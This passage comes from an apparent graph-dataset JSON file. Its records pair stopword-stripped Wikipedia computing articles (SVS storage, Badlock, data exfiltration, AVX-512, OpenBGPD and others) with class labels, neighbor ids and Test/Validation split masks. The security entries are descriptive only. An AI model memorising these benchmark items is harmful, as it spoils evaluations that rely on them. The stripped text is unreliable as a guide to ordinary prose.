svc routines preloaded virtual storage svc transient areas svs retains spool support os/360 shops used asp hasp precursors jes2 jes3 storage management svs similar mvt notable differences description somewhat simplified glosses special cases svs 16mib addressable storage single address space regardless size physical memory nucleus flpa virtual=real v=r meaning virtual address area mapped corresponding physical address job step svs request v=r storage assigned pages v=r region mapped corresponding real page frames program check occurs interrupt code 16 17 svs checks whether page assigned virtual address svs assign page frame read contents page page assigned svs causes abnormal end abend abend code 0c4 mvt would used protection violation svs provides services page fixing unfixing page fixed page frame subject page stealing primary purpose page fixing i/o i/o channels s/370 successors ability address translation however part support virtual storage operating systems ibm provided indirect data address ida feature channel control word ccw ida bit set points ida list idal rather directly i/o buffer svs provides ccw translation service part execute channel program excp svc excp necessary page fixing allocate storage ida lists translate virtual addresses real put translated addresses appropriate ida words put real addresses ida lists translated ccw i/o completes excp reverses process freeing storage translating status back virtual addition svs provides execute channel program real storage excvr svc privileged applications paged fixing build ida lists ibm provided several enhancements svs shipped part included",
    "neighbors": [
      10883,
      4996,
      6148,
      10508,
      7053,
      8077,
      9361,
      6675,
      9468,
      789,
      5397,
      9619,
      11539,
      11673,
      9370,
      6557,
      3359,
      8737,
      10273,
      421,
      7848,
      6442,
      1323,
      7983,
      8879,
      7217,
      6706,
      9139,
      10415,
      6325,
      7477,
      7733,
      10040,
      10803,
      5562,
      573,
      2811,
      1219,
      964,
      8388,
      6342,
      8262,
      11075,
      3916,
      8272,
      1235,
      340,
      3669,
      7507,
      5598,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      6503,
      6248,
      9829,
      4586,
      10094,
      5363,
      5492,
      375,
      2168,
      3323,
      2172,
      8063
    ],
    "mask": "Test"
  },
  {
    "node_id": 2814,
    "label": 3,
    "text": "Comparison_of_ARM_cores:comparison arm cores comparison microarchitectures based arm family instruction sets designed arm holdings 3rd parties sorted version arm instruction set release name cores implement arm instruction set developed independently companies architectural license arm",
    "neighbors": [
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      10945,
      9928,
      2788,
      3301,
      9964,
      6391,
      3835,
      781,
      6926,
      5417,
      7988,
      10548,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      5028,
      7077,
      9638,
      1461,
      3511,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2815,
    "label": 4,
    "text": "Badlock:badlock badlock security bug disclosed april 12 2016 affecting security account manager sam local security authority domain policy lsad remote protocols supported windows samba servers sam lsad layered onto dce 1.1 remote procedure call dce/rpc protocol implemented samba windows rpc services allowed attacker become man middle although vulnerability discovered development samba namegiving smb protocol affected",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      2709,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      5325,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      4863,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 2816,
    "label": 4,
    "text": "Data_exfiltration:data exfiltration data exfiltration occurs malware and/or malicious actor carries unauthorized data transfer computer also commonly called data extrusion data exportation data exfiltration also considered form data theft past couple decades number data exfiltration efforts severely damaged consumer confidence corporate valuation intellectual property businesses national security governments across world data exfiltration scenarios large amount aggregated data may exfiltrated however scenarios likely certain types data may targeted types data targeted includes several techniques used malicious actors carry data exfiltration technique chosen depends number factors attacker easily gain physical privileged remote access server containing data wish exfiltrate chances success much better otherwise example would relatively easy system administrator plant turn execute malware transmits data external command control server without getting caught similarly one gain physical administrative access potentially steal server holding target data realistically transfer data server dvd usb flash drive many cases malicious actors gain physical access physical systems holding target data situations may compromise user accounts remote access applications using manufacturer default weak passwords 2009 analyzing 200 data exfiltration attacks took place 24 countries spiderlabs discovered ninety percent success rate compromising user accounts remote access applications without requiring brute-force attacks malicious actor gains level access may transfer target data elsewhere additionally sophisticated forms data exfiltration various techniques used conceal detection network defenses example cross site scripting xss used exploit vulnerabilities web applications provide malicious actor sensitive data timing channel also used send data packets time specified intervals way even difficult network defenses detect prevent number things done help defend network data exfiltration three main categories preventative measures may effective one example detective measures implement intrusion detection prevention systems regularly monitor network services ensure known acceptable services running given time suspicious network services running investigate take appropriate measures immediately preventative measures include implementation maintenance access controls deception techniques encryption data process transit rest investigative measures include various forensics actions counter intelligence operations",
    "neighbors": [
      2953,
      2887
    ],
    "mask": "None"
  },
  {
    "node_id": 2817,
    "label": 9,
    "text": "Non-local_variable:non-local variable programming language theory non-local variable variable defined local scope term refer global variables primarily used context nested anonymous functions variables neither local global scope lua called upvalues function python 3 example follows nested function codice_1 defined scope another function codice_2 variable codice_3 local codice_2 non-local codice_1 global javascript locality variable determined closest codice_6 statement variable following example codice_3 local codice_2 contains codice_9 statement codice_1 n't therefore x non-local codice_1 haskell example follows variable codice_12 non-local anonymous function codice_13 non-local variables primary reason difficult support nested anonymous higher-order thereby first-class functions programming language nested function functions mutually recursive becomes hard compiler know exactly call stack non-local variable allocated frame pointer points local variable nested function arbitrary number activation records stack generally solved using access links display registers nested function passed argument higher-order function closure needs built order locate non-local variables nested function returned result outer function stored variable non-local variables longer available stack need heap allocated instead lifetime extend beyond lifetime outer function declared allocated generally requires garbage-collection",
    "neighbors": [
      1152,
      1952,
      898,
      5059,
      4777,
      9002,
      10571,
      10510,
      655,
      5040,
      5585,
      5783,
      9497
    ],
    "mask": "Test"
  },
  {
    "node_id": 2818,
    "label": 4,
    "text": "Information_privacy:information privacy information privacy relationship collection dissemination data technology public expectation privacy legal political issues surrounding also known data privacy data protection challenge data privacy use data protecting individual privacy preferences personally identifiable information fields computer security data security information security design use software hardware human resources address issue various types personal information often come privacy concerns describes ability control information one reveals oneself cable television access information example third parties track ip tv programs someone watched given time addition information broadcasting stream required audience rating survey additional devices requested installed houses viewers listeners without necessity cooperations audience ratings automatically performed real-time united kingdom 2012 education secretary michael gove described national pupil database rich dataset whose value could maximised making openly accessible including private companies kelly fiveash register said could mean child school life including exam results attendance teacher assessments even characteristics could available third-party organizations responsible anonymizing publications rather data anonymized government handed example data request gove indicated rejected past might possible improved version privacy regulations analysis sexual exploitation information person financial transactions including amount assets positions held stocks funds outstanding debts purchases sensitive criminals gain access information person accounts credit card numbers person could become victim fraud identity theft information person purchases reveal great deal person history places he/she visited he/she contacted products he/she used his/her activities habits medications he/she used cases corporations may use information target individuals marketing customized towards individual personal preferences person may may approve ability control information one reveals oneself internet access information become growing concern concerns include whether email stored read third parties without consent whether third parties continue track websites someone visited another concern websites visited collect store possibly share personally identifiable information users advent various search engines use data mining created capability data individuals collected combined wide variety sources easily ftc provided set guidelines represent widely accepted concepts concerning fair information practices electronic marketplace called fair information practice principles order give away much personal information emails encrypted browsing web pages well online activities done trace-less via anonymizers case trusted open-source distributed anonymizers called mix nets i2p tor – onion router vpns virtual private networks another anonymizer used give someone protection online includes obfuscating encrypting web traffic groups see mine email n't internet content privacy concerns age increasing amounts information going online social networking sites pose additional privacy challenges people may tagged photos valuable information exposed either choice unexpectedly others data location also accidentally published example someone posts picture store background caution exercised information posted social networks vary allow users make private remains publicly accessible without strong security settings place careful attention remains public person profiled searching collecting disparate pieces information worst case leading cases cyberstalking reputational damage location tracking capabilities mobile devices advancing location-based services problems related user privacy arise location data among sensitive data currently collected list potentially sensitive professional personal information could inferred individual knowing mobility trace published recently electronic frontier foundation include movements competitor sales force attendance particular church individual presence motel abortion clinic recent mit study de montjoye et al showed four spatio-temporal points approximate places times enough uniquely identify 95 1.5 million people mobility database study shows constraints hold even resolution dataset low therefore even coarse blurred datasets provide little anonymity people may wish medical records revealed others may concern might affect insurance coverages employment may would wish others know medical psychological conditions treatments would bring embarrassment upon revealing medical data could also reveal details one personal life three major categories medical privacy informational degree control personal information physical degree physical inaccessibility others psychological extent doctor respects patients ’ cultural beliefs inner thoughts values feelings religious practices allows make personal decisions physicians psychiatrists many cultures countries standards doctor–patient relationships include maintaining confidentiality cases physician–patient privilege legally protected practices place protect dignity patients ensure patients feel free reveal complete accurate information required receive correct treatment view united states laws governing privacy private health information see hipaa hitech act political privacy concern since voting systems emerged ancient times secret ballot simplest widespread measure ensure political views known anyone voters themselves—it nearly universal modern democracy considered basic right citizenship fact even rights privacy exist type privacy often unfortunately several forms voting fraud privacy violations possible use digital voting machines legal protection right privacy general – data privacy particular – varies greatly around world laws regulations related privacy data protection constantly changing seen important keep abreast changes law continually reassess compliance data privacy security regulations within academia institutional review boards function assure adequate measures taken ensure privacy confidentiality human subjects research privacy concerns exist wherever personally identifiable information sensitive information collected stored used finally destroyed deleted – digital form otherwise improper non-existent disclosure control root cause privacy issues data privacy issues may arise response information wide range sources heterogeneous information systems differing privacy rules interconnected information shared policy appliances required reconcile enforce monitor increasing amount privacy policy rules laws two categories technology address privacy protection commercial systems communication enforcement internet many users give away lot information unencrypted e-mails read administrators e-mail server connection encrypted https also internet service provider parties sniffing network traffic connection able know contents applies kind traffic generated internet including web browsing instant messaging others order give away much personal information e-mails encrypted browsing webpages well online activities done traceless via anonymizers open source distributed anonymizers so-called mix networks well known open-source mix nets include i2p – anonymous network tor computer privacy improved individualization currently security messages designed average user i.e message everyone researchers posited individualized messages security nudges crafted based users individual differences personality traits used improvements person compliance computer security privacy united states department commerce created international safe harbor privacy principles certification program response 1995 directive data protection directive 95/46/ec european commission directive 95/46/ec declares chapter iv article 25 personal data may transferred countries european economic area countries provide adequate privacy protection historically establishing adequacy required creation national laws broadly equivalent implemented directive 95/46/eu although exceptions blanket prohibition – example disclosure country outside eea made consent relevant individual article 26 1 – limited practical scope result article 25 created legal risk organisations transfer personal data europe united states program regulates exchange passenger name record information eu us according eu directive personal data may transferred third countries country provides adequate level protection exceptions rule provided instance controller guarantee recipient comply data protection rules european commission set working party protection individuals regard processing personal data commonly known article 29 working party working party gives advice level protection european union third countries working party negotiated u.s. representatives protection personal data safe harbor principles result notwithstanding approval self-assessment approach safe harbor remains controversial number european privacy regulators commentators safe harbor program addresses issue following way rather blanket law imposed organisations united states voluntary program enforced ftc u.s. organisations register program self-assessed compliance number standards deemed adequate purposes article 25 personal information sent organisations eea without sender breach article 25 eu national equivalents safe harbor approved providing adequate protection personal data purposes article 25 6 european commission 26 july 2000 safe harbor adoptee organisations need carefully consider compliance onward transfer obligations personal data originating eu transferred us safe harbor onward third country alternative compliance approach binding corporate rules recommended many eu privacy regulators resolves issue addition dispute arising relation transfer hr data us safe harbor must heard panel eu privacy regulators july 2007 new controversial passenger name record agreement us eu made short time afterwards bush administration gave exemption department homeland security arrival departure information system adis automated target system 1974 privacy act february 2008 jonathan faull head eu commission home affairs complained us bilateral policy concerning pnr us signed february 2008 memorandum understanding mou czech republic exchange visa waiver scheme without concerting brussels tensions washington brussels mainly caused lesser level data protection us especially since foreigners benefit us privacy act 1974 countries approached bilateral mou included united kingdom estonia germany greece",
    "neighbors": [
      10245,
      1161,
      522,
      1930,
      8329,
      5133,
      782,
      3599,
      9356,
      1169,
      3858,
      2451,
      10002,
      8085,
      11156,
      8471,
      1560,
      7965,
      10020,
      2725,
      7590,
      3111,
      3880,
      10665,
      9260,
      2733,
      3629,
      9901,
      6455,
      5433,
      5689,
      3521,
      10050,
      7369,
      9548,
      845,
      4435,
      7893,
      1368,
      8921,
      2779,
      2013,
      9440,
      1768,
      6513,
      755,
      2932,
      4213,
      5749,
      6131,
      10486,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2819,
    "label": 2,
    "text": "Core_Data:core data core data object graph persistence framework provided apple macos ios operating systems introduced mac os x 10.4 tiger ios iphone sdk 3.0 allows data organized relational entity–attribute model serialized xml binary sqlite stores data manipulated using higher level objects representing entities relationships core data manages serialized version providing object lifecycle object graph management including persistence core data interfaces directly sqlite insulating developer underlying sql cocoa bindings handle many duties controller model–view–controller design core data handles many duties data model among tasks handles change management serializing disk memory footprint minimization queries data core data describes data high level data model expressed terms entities relationships plus fetch requests retrieve entities meeting specific criteria code retrieve manipulate data purely object level without worry details storage retrieval controller objects available interface builder retrieve manipulate entities directly combined cocoa bindings ui display many components data model without needing background code example developer might writing program handle vcards order manage author intends read vcards objects store single larger xml file using core data developer would drag schema data designer xcode interface builder window create gui schema could write standard objective-c swift code read vcard files put data core data managed entities point author code manipulates core data objects rather underlying vcards connecting codice_1 menu item appropriate method controller object direct controller examine object stack determine objects dirty re-write core data document file changes core data organized large hierarchy classes though interaction prevalent small set core data serialize objects xml binary sqlite storage release mac os x 10.5 leopard developers also create custom atomic store types method carries advantages disadvantages human readable xml memory efficient sqlite portion core data similar original enterprise objects framework eof system one write fairly sophisticated queries unlike eof possible write sql underlying store may sql-based recently core data store odbc made available odbc framework core data schemas standardized xcode data model file read write files format freely unlike eof though core data currently designed multiuser simultaneous access unless use odbc framework schema migration also non-trivial almost always requiring code developers access depend upon data model may need provide version translation code addition new data model schema changes core data owes much design earlier next product enterprise objects framework eof eof object-relational mapping high-end sql database engines microsoft sql server oracle eof purpose twofold first connect database engine hide implementation details second read data relational format translate set objects developers typically interacted objects simplified development complex programs cost setup map data objects eof object model deliberately designed make resulting programs work document-like fashion user could edit data locally memory write changes single save command throughout history eof contained number bits useful code otherwise available nextstep/openstep instance eof required ability track objects dirty system could later write presented developer document-like system also form unlimited undo command stack command applied data represented undoable action many developers complained state management code far useful isolated eof later moved cocoa api transition mac os x initially translated eof eof used primarily along another openstep-era product webobjects application server originally based objective-c. time apple process porting webobjects java programming language part conversion eof became much difficult use cocoa considerable complaining among 3rd party developers one critical realization object state management system eof really anything relational databases code could used developers manage graphs objects well role really useful parts eof automatically built object sets raw data tracked concept forms basis core data",
    "neighbors": [
      9732,
      4615,
      3080,
      1549,
      5647,
      1042,
      6700,
      5677,
      4657,
      1074,
      9784,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      3691,
      8303,
      6771,
      2676,
      6264,
      7292,
      7806,
      2686,
      9343,
      3719,
      10888,
      11402,
      7307,
      8852,
      1686,
      7318,
      5784,
      4251,
      3228,
      2207,
      1699,
      10406,
      171,
      5292,
      8877,
      1710,
      10413,
      3248,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      3286,
      9430,
      3289,
      4318,
      10470,
      231,
      2282,
      9451,
      4844,
      10478,
      2288,
      7928,
      8441,
      9467,
      7422,
      11521,
      1796,
      9999,
      10512,
      11030,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      9022,
      1346,
      4933,
      838,
      9035,
      1878,
      6495,
      9063,
      4457,
      10602,
      10608,
      9589,
      6539,
      9100,
      9109,
      1439,
      9123,
      5546,
      9661,
      6093,
      7118,
      3035,
      4571,
      3038,
      479,
      4068,
      5093,
      487,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 2820,
    "label": 9,
    "text": "James_Cordy:james cordy james reginald cordy born january 2 1950 canadian computer scientist educator professor school computing queen university researcher currently active fields source code analysis manipulation software reverse re-engineering pattern analysis machine intelligence long record previous work programming languages compiler technology software architecture currently best known work txl source transformation language parser-based framework functional programming language designed support software analysis transformation tasks originally developed m.sc student charles halpern-hamu 1985 tool experimenting programming language design recent work nicad clone detector ph.d. student chanchal roy recognition strategy language ph.d. student richard zanibbi dorothea blostein cerno lightweight natural language understanding system john mylopoulos others university trento simone model clone detector manar alalfi thomas r. dean matthew stephan andrew stevenson based txl 1995 paper syntactic theory software architecture ph.d. student thomas r. dean widely cited seminal work area led work thomas r. dean kevin a. schneider andrew j. malton legacy systems analysis work programming languages included design concurrent euclid 1980 turing 1983 r.c holt implementation euclid 1978 sp/k 1974 languages r.c holt d.b wortman d.t barnard others part projects developed s/sl compiler technology r.c holt d.b wortman based m.sc thesis work orthogonal code generation method based ph.d. thesis work co-authored co-edited books turing programming language design definition 1988 introduction compiler construction using s/sl 1986 smart internet 2010 personal web 2013 2002 2007 director queen school computing 2008 elected distinguished scientist association computing machinery prolific academic supervisor 2008 recognized queen university award excellence graduate supervision 2016 queen university prize excellence research",
    "neighbors": [
      11132,
      2830
    ],
    "mask": "Test"
  },
  {
    "node_id": 2821,
    "label": 3,
    "text": "AVX-512:avx-512 avx-512 512-bit extensions 256-bit advanced vector extensions simd instructions x86 instruction set architecture isa proposed intel july 2013 supported intel xeon phi x200 knights landing skylake-x cpus includes core-x series excluding core i5-7640x core i7-7740x well new xeon scalable processor family xeon d-2100 embedded series avx-512 first 512-bit simd instruction set intel introduced processors earlier 512-bit simd instructions used xeon phi coprocessors derived intel larrabee project similar binary compatible partially source compatible avx-512 consists multiple extensions meant supported processors implementing policy departure historical requirement implementing entire instruction block core extension avx-512f avx-512 foundation required implementations avx-512 instruction set consists several separate sets unique cpuid feature bit however typically grouped supporting processor generation vex prefix used avx avx2 flexible leave enough room features intel wanted add avx-512 led define new prefix called evex compared vex evex adds following benefits extended registers simd width bit opmask registers avx-512 mandatory require support os avx-512 instructions designed mix 128/256-bit avx/avx2 instructions without performance penalty however avx-512vl extensions allows use avx-512 instructions 128/256-bit registers xmm/ymm sse avx/avx2 instructions new avx-512 versions encoded evex prefix allow access new features opmask additional registers unlike avx-256 new instructions new mnemonics share namespace avx making distinction vex evex encoded versions instruction ambiguous source code since avx-512f supports 32- 64-bit values sse avx/avx2 instructions operate bytes words supported avx-512bw extension byte word support width simd register file increased 256 bits 512 bits expanded 16 total 32 registers zmm0-zmm31 registers addressed 256 bit ymm registers avx extensions 128-bit xmm registers streaming simd extensions legacy avx sse instructions extended operate 16 additional registers xmm16-xmm31 ymm16-ymm31 using evex encoded form avx-512 instructions may indicate one 8 opmask registers k0–k7 first one k0 however hardcoded constant used indicate unmasked operations instructions opmask used control values written destination flag controls opmask behavior either zero zeros everything selected mask merge leaves everything selected untouched merge behavior identical blend instructions opmask registers normally 16 bits wide 64 bits avx-512bw extension many bits actually used though depends vector type instructions masked 32-bit single float double words 16 bits used mask 16 elements 512-bit register double float quad words 8 mask bits used opmask register reason several bitwise instructions naturally element widths added avx-512 instance bitwise 128-bit shuffle exist double-word quad-word variants difference final masking opmask registers new mini extension instructions operating directly unlike rest avx-512 instructions instructions vex encoded initial opmask instructions 16-bit word versions avx-512dq 8-bit byte versions added better match needs masking 8 64-bit values avx-512bw 32-bit double 64-bit quad versions added mask 64 8-bit values instructions kortest ktest used set x86 flags based mask registers may used together non-simd x86 branch conditional instructions many avx-512 instructions simply evex versions old sse avx instructions however several new instructions old instructions replaced new avx-512 versions new majorly reworked instructions listed foundation instructions also include extensions avx-512vl avx-512bw since extensions merely add new versions instructions instead new instructions evex-prefixed versions blend instructions sse4 instead avx-512 new set blending instructions using mask registers selectors together general compare mask instructions may used implement generic ternary operations cmov similar xop vpcmov since blending integral part evex encoding instruction may also considered basic move instructions using zeroing blend mode also used masking instructions avx-512f four new compare instructions like xop counterparts use immediate field select 8 different comparisons unlike xop inspiration however save result mask register initially support doubleword quadword comparisons avx-512bw extension provides byte word versions note two mask registers may specified instructions one write one declare regular masking final way set masks using logical set mask instructions perform either nand set destination opmask based result values zero non-zero note like comparison instructions take two opmask registers one destination one regular opmask compress expand instructions match apl operations name use opmask slightly different way avx-512 instructions compress saves values marked mask saves compacted skipping reserving space unmarked values expand operates opposite way loading many values indicated mask spreading selected positions new set permute instructions added full two input permutations take three arguments two source registers one index result output either overwriting first source register index register avx-512bw extends instructions also include 16-bit word versions avx-512_vbmi extension defines byte versions instructions two new instructions added logically implement possible bitwise operations three inputs take three registers input 8-bit immediate field bit output generated using lookup three corresponding bits inputs select one 8 positions 8-bit immediate since 8 combinations possible using three bits allow possible 3 input bitwise operations performed bitwise vector instructions avx-512f evex versions two source sse avx bitwise vector instructions andn xor added avx-512dq difference doubleword quadword versions application opmask truth table number conversion move instructions added complete set conversion instructions available sse2 among unique new features avx-512f instructions decompose floating-point values handle special floating-point values since methods completely new also exist scalar versions second set new floating-point methods includes new scaling approximate calculation reciprocal reciprocal square root approximate reciprocal instructions guarantee relative error 2 instructions avx-512 conflict detection avx-512cd designed help efficiently calculate conflict-free subsets elements loops normally could safely vectorized avx-512 exponential reciprocal instructions contain accurate approximate reciprocal instructions avx-512 foundation relative error 2 also contain two new exponential functions relative error 2 avx-512 prefetch instructions contain new prefetch operations new scatter gather functionality introduced avx2 avx-512 codice_1 prefetch means prefetching level 1 cache codice_2 means prefetching level 2 cache avx-512dq adds new doubleword quadword instructions avx-512bw adds byte words versions instructions adds byte word version doubleword/quadword instructions avx-512f instructions get word forms avx-512bw acquire byte forms avx-512_vbmi extension codice_3 codice_4 codice_5 codice_6 two new instructions added mask instructions set codice_7 codice_8 b w forms avx-512dq q avx-512bw rest mask instructions word forms got byte forms avx-512dq doubleword/quadword forms avx-512bw codice_9 extended codice_10 codice_11 avx-512bw among instructions added avx-512dq several sse avx instruction n't get avx-512 versions avx-512f among two input bitwise instructions extract/insert integer instructions instructions completely new covered three new floating point operations introduced since new avx-512 packed/simd scalar versions codice_12 instructions tests floating point value one eight special floating-point values eight values trigger bit output mask register controlled immediate field codice_13 instructions perform minimum maximum operations depending value immediate field also control operation done absolute separately sign handled codice_14 instructions operate single source subtract integer part source value plus number bits specified immediate field fraction extend vpcompress vpexpand byte word variants shift instructions new vector neural network instructions evex-encoded galois field new instructions vpclmulqdq avx-512f adds evex-encoded 512-bit version pclmulqdq instruction avx-512vl adds evex-encoded 256- 128-bit versions vpclmulqdq alone non-avx512 cpus adds vex-encoded 256-bit version availability vex-encoded 128-bit version indicated different cpuid bits pclmulqdq avx wider 128-bit variations instruction perform operation 128-bit portion input registers extend select quadwords different 128-bit fields meaning imm8 operand either low high quadword 128-bit field selected evex-encoded aes instructions wider 128-bit variations instruction perform operation 128-bit portion input registers intel vectorization advisor starting version 2016 update 3 supports native avx-512 performance vector code quality analysis 2nd generation intel xeon phi codenamed knights landing processor along traditional hotspots profile advisor recommendations seamless integration intel compiler vectorization diagnostics advisor survey analysis also provides avx-512 isa metrics new avx-512-specific traits e.g scatter compress/expand mask utilization",
    "neighbors": [
      9095,
      4491,
      6924,
      4237,
      10383,
      6038,
      9111,
      9369,
      9500,
      6821,
      2088,
      9391,
      2224,
      4276,
      8120,
      7097,
      8506,
      1085,
      8125,
      8126,
      833,
      7234,
      5444,
      9541,
      3142,
      1998,
      5326,
      977,
      1489,
      2514,
      5844,
      9428,
      2519,
      4603,
      8795,
      2655,
      1119,
      1122,
      7783,
      1000,
      10985,
      4204,
      9964,
      5358,
      9582,
      8944,
      499,
      1399,
      9976,
      1915,
      10620
    ],
    "mask": "Test"
  },
  {
    "node_id": 2822,
    "label": 3,
    "text": "Highway_Encounter:highway encounter highway encounter computer game released sinclair zx spectrum 48k amstrad cpc msx commodore 64 tatung einstein vortex software 1985 written costa panayi also coded android two tll cyclone revolution highway encounter strategy/action game played 3d isometric perspective must successfully chaperone bomb along long straight stretch highway alien base end thirty screens pass filled hazards threaten block progress barrels destroy aliens explosive mines players control robotic vorton resembling dalek doctor one things provides highway encounter unique appeal bomb constantly pushed onwards extra lives four vortons accompany along highway key strategic element game player character travel several screens ahead bomb clear safe path normally would done temporarily blocking bomb forward motion however bomb left unsafe location possible extra lives lost without player character destroyed spare lives lost player character must manually push bomb spectrum version game voted number 40 sinclair official top 100 games time unfinished officially unreleased available download version atari st made mark haigh-hutchinson graphics costa panayi 1990 highway encounter followed sequel alien highway 1986",
    "neighbors": [
      7536,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 2823,
    "label": 4,
    "text": "DHS_Cyber_Security_Division:dhs cyber security division cyber security division csd division science technology directorate united states department homeland security within homeland security advanced research projects agency csd develops technologies enhance security resilience united states critical information infrastructure acts terrorism",
    "neighbors": [
      11358
    ],
    "mask": "None"
  },
  {
    "node_id": 2824,
    "label": 4,
    "text": "Evidence_Eliminator:evidence eliminator evidence eliminator computer software program ran microsoft windows operating system program deletes hidden information user hard drive normal procedures may fail delete cleaner eraser programs typically overwrite previously allocated disk space order make difficult salvage deleted information absence overwrite procedures information user thinks deleted may actually remain hard drive physical space claimed another use i.e. store another file offered sale program cost 149.99 evidence eliminator produced robin hood software based nottingham england version 6.04 controversy surrounding evidence eliminator marketing tactics company used popup ads market program including ads user system compromised response robin hood software produced dis-information page addressing concerns radsoft competitor robin hood criticised operation june 1 2005 peter beale one phoenix four used evidence eliminator remove trace certain files pc day appointment dti inspectors investigate collapse mg rover 2011 case mga v. mattel federal court found former employee used program delete information accused giving mga employed mattel howard marc watzman pedotrictian chicago financially connected belarus internet child trafficking ring used evidence eliminator attempt remove 200,000 images child pornography computer",
    "neighbors": [
      5284,
      2534,
      8329,
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 2825,
    "label": 2,
    "text": "OpenBGPD:openbgpd openbgpd server software program allows general purpose computers used routers unix system daemon provides free open-source implementation border gateway protocol version 4 allows machine exchange routes systems speak bgp openbgpd developed henning brauer peter hessler claudio jeker part openbsd project openospfd developed esben nørby companion daemon openbgpd implements open shortest path first protocol suite developed alternative packages quagga linux-focused routing suite licensed gpl meet project requirements quality standards design goals openbgpd include secure non-exploitable reliable lean enough users size memory usage configuration language powerful easy use must also able quickly handle hundreds thousands table entries memory-efficient way openbgpd consists parent process two child processes route decision engine rde session engine se parent process part n't drop privileges others interest non-exploitability parent process drop privileges needs update routing table run root port",
    "neighbors": [
      4611,
      9223,
      10631,
      3465,
      1932,
      3473,
      274,
      8725,
      1814,
      7702,
      8344,
      10105,
      1436,
      2085,
      3751,
      7082,
      3885,
      686,
      6702,
      7983,
      9520,
      823,
      3007,
      6719,
      9279,
      10303,
      10433,
      2245,
      5959,
      9927,
      1993,
      5322,
      8778,
      3404,
      11086,
      2383,
      7887,
      5970,
      10451,
      9048,
      1754,
      5978,
      5084,
      7139,
      1637,
      4071,
      5230,
      5492,
      1785,
      8954,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2826,
    "label": 7,
    "text": "SpeedTree:speedtree speedtree group vegetation programming modeling software products developed sold interactive data visualization inc. idv generates virtual foliage animations architecture real time video games demanding real time simulations speedtree licensed developers range video games microsoft windows xbox playstation console series since 2002 speedtree used 40 major films since release 2009 including iron man 3 star trek darkness life pi birdman used generate lush vegetation pandora avatar speedtree awarded scientific technical academy award 2015 presented idv founders michael sechrest chris king senior engineer greg croft speedtree conceptualized idv circa 2000 originated due firm lack satisfaction 3rd-party tree-generation software market initial version speedtreecad cad standing computer-aided design developed idv real-time golf simulation although backers pulled golf project idv refined cad software 3d studio max plug-in animated architectural rendering dubbing speedtreemax speedtreemax released february 2002 toward end 2002 idv released speedtreert real-time foliage/tree middleware sdk allowed automatic levels foliage detail real-time wind effects multiple lighting options idv eventually released plug-ins maya well appropriately named speedtreemaya early 2009 idv discontinued speedtreemax speedtreemaya plugins replacing speedtree modeler compiler products idv released speedtree 5 july 2009 version representing complete re-engineering software first versions speedtree enabling hand modeling editing vegetation models speedtree modeler replacing speedtreecad speedtreesdk replacing speedtreert speedtree compiler prepares speedtree files real-time rendering speedtree cinema first released idv 2009 based version 5 technology speedtree games version 6 released november 7 2011 essentially re-branded version speedtree 6 modeler compiler product identified speedtree games distinguish products meant gaming/real-time use speedtree architect released october 15 2012 designed architectural 3d cad use 3d fly-throughs idv released updated versions speedtree cinema speedtree studio speedtree architect november 2013 idv released speedtree v7 unreal engine 4 july 2014 idv released speedtree v7 unity 5 new engine version launch date march 2015 idv released speedtree games v7 april 16 2015 idv three engineers received scientific technical academy award 2015 speedtree cinema product suite speedtree cinema released idv 2009 saw first major use avatar james cameron speedtree cinema designed use film industry generates high-resolution meshes high-quality textures autodesk 3ds max autodesk maya cinema4d cinema edition includes speedtree modeler complete tree model library designed idv suites tree packs must purchased separately several members speedtree line simulate animated growth trees plants seasonal changes export data animated wind effects speedtree studio released idv 2009 less expensive companion speedtree cinema include cinema features complete tree model library speedtree architect released 2012 designed use 3d architectural cad generates meshes compatible typical architectural applications autodesk 3ds max autodesk maya rhino architect edition also exports normal maps uv maps physically-accurate rendering engines v-ray mental ray speedtree games edition speedtree video game development contrasting subscription edition offered users unity game development engine certain versions unreal engine 4 engine games edition includes modeler compiler sdk edition permits game developers integrate speedtree runtime technology game engine choice meshes generated system low poly multiple levels detail use texture atlases typically stored efficient binary format speedtree subscription edition low-cost edition speedtree modeler runtime targeted independent game studios licensing fee 19 usd monthly charge well additional charges tree packs subscribers get access speedtree editor ability generate 3d models trees plants plants exclusively usable either unreal engine 4 unity depending license subscribers download additional tree model packs model library pricing varies packs speedtree modeler windows-based specialized modeling tool designing foliage modeler features combination procedural tree generation hand-editing tools draw trees transform individual tree parts procedural tree generation uses configuration branch length branching angles bark texture generate tree variety formats newer versions support drag-and-drop interface automatically blends branch intersections handles branch collisions speedtree compiler software enables creation efficient tree models use real-time rendering video games generates texture atlases compiles optimizes tree models real-time use speedtree sdk multi-platform 